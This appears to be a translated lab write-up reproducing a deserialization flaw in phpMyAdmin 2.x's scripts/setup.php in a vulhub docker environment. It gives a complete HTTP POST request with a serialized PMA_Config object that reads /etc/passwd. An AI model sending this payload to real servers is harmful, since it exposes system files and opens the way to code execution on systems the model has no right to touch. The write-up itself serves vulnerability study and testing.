[vulnerability recurrence] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

There is a deserialization vulnerability in phpMyAdmin 2. X, through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Building docker environment of vulhub

Execute the following command in/home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

Check that the open port is 8080

After the environment is started, visit http://ip : 8080 , you can see the home page of phpMyAdmin. Because there is no connection to the database, an error will be reported at this time, but the exploitation of this vulnerability has nothing to do with the database, so it is ignored.

0x03 vulnerability recurrence

Capturing packets with BP

Send the following packets to read /etc/passwd :

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the/etc/passwd file.